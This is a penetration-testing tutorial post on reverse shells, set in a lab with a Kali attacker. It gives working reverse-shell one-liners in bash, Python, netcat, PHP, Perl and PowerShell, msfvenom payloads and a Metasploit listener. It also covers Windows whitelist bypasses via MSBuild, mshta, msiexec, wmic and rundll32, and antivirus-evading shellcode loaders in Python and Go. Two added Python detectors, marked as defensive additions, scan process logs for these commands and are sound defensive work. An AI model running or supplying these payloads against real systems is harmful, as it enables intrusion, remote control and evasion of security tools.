Reverse shells in penetration testing: multiple methods and bypasses
Word count: 1195 | 2025-08-26 22:11:34
Reverse shells in penetration testing: a detailed look at the methods and bypass techniques
Basic concepts: forward vs. reverse connections
Forward connection: the attacking machine initiates the connection to the target (e.g. SSH, RDP)
- Applicable when: the target has a public IP and the port is open
Reverse connection: the target machine initiates the connection back to the attacking machine
- Why it is used more often:
  - the target sits inside a LAN
  - the target uses a dynamic IP
  - the target is behind firewall restrictions
Lab environment
- Attacker: Kali Linux (172.16.1.130)
- Victims: CentOS 7 (172.16.1.134) / Windows 7 (172.16.1.135)
Common reverse shell methods
1. Bash
Basic form:
bash -i >& /dev/tcp/172.16.1.130/4444 0>&1
Advanced form:
exec 5<>/dev/tcp/172.16.1.130/4444; cat <&5 | while read line; do $line 2>&5 >&5; done
2. Python
Linux reverse connection:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
3. Netcat
Requirement: nc is present on the target and supports the -e option
nc 172.16.1.130 4444 -t -e /bin/bash
4. PHP
Command-line form:
php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
5. Java (shown in Groovy syntax)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
6. Perl
perl -e 'use Socket;$i="172.16.1.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
7. PowerShell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444
8. Payload generated with MSFVenom
Generate the payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.130 LPORT=4444 -f exe > shell.exe
MSF listener:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.1.130
set LPORT 4444
set ExitOnSession false
exploit -j -z
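The one-liners above share a small set of command-line features: a `/dev/tcp` path, `nc -e` with a shell, `socket` plus `dup2` in an inline Python script, `fsockopen` followed by `exec`, `use Socket` plus `exec` in Perl, or a PowerShell download cradle. As an added example from the defender's side, not part of the original post, the following Python scans process-creation events for those features. The "key=value ... cmdline=<rest>" line layout and the sample events are constructed for this example; real auditd, Sysmon for Linux or EDR records carry the same fields under different names.

```python
import re
from typing import Dict, List, NamedTuple, Optional


class ProcEvent(NamedTuple):
    ts: str
    host: str
    user: str
    pid: int
    cmdline: str


# Constructed sample events; the "key=value ... cmdline=<rest of line>" layout is an
# assumption made for this example, not the format of any particular audit product.
SAMPLE_LOG = """\
2025-08-26T22:11:34Z host=web01 user=www-data pid=4242 cmdline=bash -i >& /dev/tcp/172.16.1.130/4444 0>&1
2025-08-26T22:11:35Z host=web01 user=www-data pid=4243 cmdline=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.130",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
2025-08-26T22:11:36Z host=web01 user=root pid=4244 cmdline=nc 172.16.1.130 4444 -t -e /bin/bash
2025-08-26T22:11:37Z host=web01 user=www-data pid=4245 cmdline=php -r '$sock=fsockopen("172.16.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
2025-08-26T22:11:38Z host=web01 user=backup pid=4246 cmdline=python -c 'print("backup ok")'
2025-08-26T22:11:39Z host=web01 user=root pid=4247 cmdline=bash -c "exec 5<>/dev/tcp/172.16.1.130/4444; cat <&5 | while read line; do $line 2>&5 >&5; done"
2025-08-26T22:11:40Z host=web01 user=monitor pid=4248 cmdline=curl -s http://127.0.0.1:8080/health
"""

EVENT_RE = re.compile(r"^(\S+) host=(\S+) user=(\S+) pid=(\d+) cmdline=(.*)$")

# One compiled pattern per reverse-shell family shown in this post.
RULES = {
    # bash/sh redirection to /dev/tcp/<ip>/<port> (basic and exec-5<> forms)
    "bash_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}"),
    # nc/ncat with -e or -c handing a shell to the socket
    "nc_exec_shell": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[A-Za-z]*[ec]\s+/bin/(?:ba|z|da)?sh\b"),
    # inline python creating a socket and duplicating it over stdin/stdout/stderr
    "python_socket_dup2": re.compile(r"\bpython[0-9.]*\s+-c\b.*socket\.socket\(.*os\.dup2\("),
    # php -r opening a socket and then executing a shell
    "php_fsockopen_exec": re.compile(r"\bphp\s+-r\b.*fsockopen\(.*(?:exec|system|shell_exec|passthru|popen|proc_open)\("),
    # perl -e using Socket and exec'ing a shell
    "perl_socket_exec": re.compile(r"\bperl\s+-e\b.*use\s+Socket.*\bexec\("),
    # PowerShell download cradle or the Nishang TCP shell function
    "powershell_tcp_cradle": re.compile(r"(?i)DownloadString\(|Invoke-PowerShellTcp"),
}


def parse_event(line: str) -> Optional[ProcEvent]:
    """Split one constructed log line into its fields; None if it does not fit the layout."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ts, host, user, pid, cmd = m.groups()
    return ProcEvent(ts, host, user, int(pid), cmd)


def classify(cmdline: str) -> List[str]:
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse each line and report the processes matching at least one rule."""
    findings = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        hits = classify(ev.cmdline)
        if hits:
            findings.append({"ts": ev.ts, "host": ev.host, "user": ev.user,
                             "pid": ev.pid, "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']} pid={f['pid']} user={f['user']} -> {', '.join(f['rules'])}")
```

The benign `python -c 'print(...)'` and `curl` lines pass untouched because each rule requires the combination that makes a reverse shell (socket creation plus descriptor duplication or exec), not a single keyword; the `/dev/tcp` rule is the one most likely to need an allow-list, since some health-check scripts use it for legitimate port probes.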
Windows whitelist bypass techniques
1. MSBuild
Principle: use the Microsoft-signed MSBuild.exe to execute C# code
Steps:
- Generate x64 shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp
- Execute:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\path\to\exec.xml"
2. InstallUtil.exe
Steps:
- Generate C# shellcode:
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp
- Compile:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:InstallUtil-shell.exe InstallUtil-ShellCode.cs
- Execute:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtil-shell.exe
3. Regasm/Regsvcs
Steps:
- Generate shellcode and compile it into a DLL:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs
- Execute:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 1.dll
or
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U 1.dll
4. Mshta
Steps:
- Generate base64-encoded shellcode:
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f raw > shellcode.bin
cat shellcode.bin | base64 -w 0
- Use the CACTUSTORCH template
- Execute:
mshta.exe http://attacker.com/shellcode.hta
5. Msiexec
Steps:
- Generate an MSI-format payload:
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f msi > shellcode.txt
- Execute:
msiexec.exe /q /i http://172.16.1.130/shellcode.txt
6. Wmic
PoC:
wmic os get /FORMAT:"http://example.com/evil.xsl"
Example evil.xsl:
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
  <output method="text" />
  <ms:script implements-prefix="user" language="JScript">
    <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]>
  </ms:script>
</stylesheet>
7. Rundll32
Method 1:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Method 2:
rundll32.exe shell32.dll,Control_RunDLL C:\path\to\payload.dll
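Every technique in this section runs attacker-supplied content under a Microsoft-signed binary, so the binary's name alone is not the indicator; the arguments it is given (a remote URL, an .xml project, a DLL outside the Windows directory, `/U`, `javascript:`, `Control_RunDLL` with a .dll) and the network connection the process opens shortly afterwards are. As an added example from the defender's side, not part of the original post, the following Python correlates process-creation and network-connection records shaped like Sysmon Event IDs 1 and 3: the command-line rules mirror the invocations above, and an outbound connection from a binary that normally has none (MSBuild, InstallUtil, regsvcs/regasm, wmic) counts as a signal even when the command line looks clean. Event layouts, PIDs, paths and destinations are constructed for the example, and the 30-second correlation window is an assumption.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple


class ProcCreate(NamedTuple):   # shaped like Sysmon Event ID 1 (process creation)
    ts: datetime
    pid: int
    image: str
    command_line: str


class NetConnect(NamedTuple):   # shaped like Sysmon Event ID 3 (network connection)
    ts: datetime
    pid: int
    image: str
    dest: str                   # "ip:port"


# Signed Windows binaries abused in this section ...
LOLBIN_IMAGE = re.compile(r'(?i)\\(?:msbuild|installutil|regsvcs|regasm|mshta|msiexec|wmic|rundll32)\.exe$')
# ... and the subset that has no legitimate reason to open outbound connections.
NO_NETWORK_EXPECTED = re.compile(r'(?i)\\(?:msbuild|installutil|regsvcs|regasm|wmic)\.exe$')

# Command-line rules mirroring the invocations shown in this section.
CMDLINE_RULES = [(name, re.compile(pattern)) for name, pattern in [
    ("msbuild_xml_project",     r'(?i)msbuild\.exe"?.*\.xml"?\s*$'),
    ("installutil_uninstall",   r'(?i)installutil\.exe"?.*\s/u\b'),
    ("regsvcs_regasm_user_dll", r'(?i)reg(?:svcs|asm)\.exe"?\s+(?:/u\s+)?(?!c:\\windows\\)[^\s"]+\.dll\b'),
    ("mshta_remote_hta",        r'(?i)mshta\.exe"?.*https?://'),
    ("msiexec_remote_package",  r'(?i)msiexec\.exe"?.*\s/i\s+"?https?://'),
    ("wmic_remote_xsl",         r'(?i)wmic\.exe"?.*/format:\s*"?https?://'),
    ("rundll32_javascript",     r'(?i)rundll32\.exe"?.*(?:javascript:|RunHTMLApplication)'),
    ("rundll32_control_rundll", r'(?i)rundll32\.exe"?.*Control_RunDLL\s+\S+\.dll\b'),
]]


def cmdline_hits(cmd: str) -> List[str]:
    """Names of the command-line rules matching this process's arguments."""
    return [name for name, rx in CMDLINE_RULES if rx.search(cmd)]


def net_within(proc: ProcCreate, nets: List[NetConnect], window: timedelta) -> List[str]:
    """Destinations this process (same pid and image) contacted within `window` of being created."""
    return [n.dest for n in nets
            if n.pid == proc.pid and n.image.lower() == proc.image.lower()
            and timedelta(0) <= n.ts - proc.ts <= window]


def correlate(procs: List[ProcCreate], nets: List[NetConnect],
              window: timedelta = timedelta(seconds=30)) -> List[Dict[str, object]]:
    """Report LOLBin launches whose arguments or follow-up network activity look abusive."""
    findings = []
    for p in procs:
        if not LOLBIN_IMAGE.search(p.image):
            continue
        rules = cmdline_hits(p.command_line)
        dests = net_within(p, nets, window)
        network_signal = bool(dests) and bool(NO_NETWORK_EXPECTED.search(p.image))
        if not rules and not network_signal:
            continue
        severity = "high" if rules and dests else "medium"
        findings.append({"pid": p.pid, "image": p.image.rsplit("\\", 1)[-1],
                         "rules": rules, "dests": dests, "severity": severity})
    return findings


# Constructed timeline (PIDs, paths and destinations are made up for the example).
T0 = datetime(2025, 8, 26, 22, 11, 34)
def at(seconds: int) -> datetime:
    return T0 + timedelta(seconds=seconds)

MSB = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
IU = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe"
RS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
MSHTA, MSI = r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\msiexec.exe"
WMIC, RD = r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\rundll32.exe"

SAMPLE_PROCS = [
    ProcCreate(at(0), 1200, MSB, MSB + r' "C:\Users\Public\build.csproj"'),       # clean-looking args
    ProcCreate(at(5), 1300, IU, IU + " /logfile= /LogToConsole=false /U InstallUtil-shell.exe"),
    ProcCreate(at(10), 1400, MSHTA, MSHTA + " http://attacker.com/shellcode.hta"),
    ProcCreate(at(15), 1500, MSI, MSI + " /q /i http://172.16.1.130/shellcode.txt"),
    ProcCreate(at(20), 1600, WMIC, WMIC + ' os get /FORMAT:"http://example.com/evil.xsl"'),
    ProcCreate(at(25), 1700, RD, RD + r' javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("window.close()")'),
    ProcCreate(at(30), 1800, RD, RD + r" shell32.dll,Control_RunDLL C:\Users\Public\payload.dll"),
    ProcCreate(at(35), 2200, RS, RS + " 1.dll"),
    ProcCreate(at(40), 1900, MSB, MSB + r" C:\build\App.csproj"),                   # benign build
    ProcCreate(at(45), 2100, RD, RD + " shell32.dll,Control_RunDLL timedate.cpl"),  # benign control panel
]
SAMPLE_NETS = [
    NetConnect(at(2), 1200, MSB, "172.16.1.130:4444"),
    NetConnect(at(6), 1300, IU, "172.16.1.130:4444"),
    NetConnect(at(11), 1400, MSHTA, "172.16.1.130:80"),
    NetConnect(at(21), 1600, WMIC, "172.16.1.130:80"),
    NetConnect(at(155), 2200, RS, "172.16.1.130:4444"),   # 120 s after creation: outside the window
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_PROCS, SAMPLE_NETS):
        print(f"[{f['severity']}] pid={f['pid']} {f['image']} rules={f['rules']} dests={f['dests']}")
```

The MSBuild run with a plausible .csproj is reported on the network signal alone, which is the case that matters once the payload is separated from the command line; the regsvcs launch whose connection arrives two minutes later is reported on its arguments only, so the window length is the knob to tune against the delays seen in real telemetry.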
Payload separation for AV evasion
1. Shellcode loader
- Generate shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c
- Execute:
shellcode_launcher.exe -i test.c
2. Using less common languages
Python + PyInstaller
Python template:
#!/usr/bin/env python
# encoding:utf-8
import ctypes
def execute():
    # replace with your shellcode
    shellcode = bytearray("\xbe\x24\x6e\x0c\x71\xda...")
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
if __name__ == "__main__":
    execute()
Compile:
pyinstaller.py -F --console payload.py
Go + UPX compression
Go template:
package main
import "C"
import "unsafe"
func main() {
    buf := ""
    buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
    // ... shellcode ...
    shellcode := []byte(buf)
    C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}
Compile:
go build -ldflags="-s -w" payload.go
upx payload.exe
Summary and practical advice
- Choose the right method:
  - On Linux, prefer bash/python
  - On Windows, pick a whitelist technique according to the situation
- AV-evasion essentials:
  - Use whitelisted programs where possible
  - Consider payload separation
  - Implement in an uncommon language
- Practical considerations:
  - Choose the simplest method that fits the target environment
  - A complex bypass may work less reliably than a simple reverse shell
  - Mind privileges and firewall rules
- Other usable techniques:
  - compiler.exe
  - odbcconf
  - psexec
  - ftp.exe, etc.
- References:
  - The Micro8 series
  - 三好学生's GitHub projects
  - 离别歌's Python backdoor techniques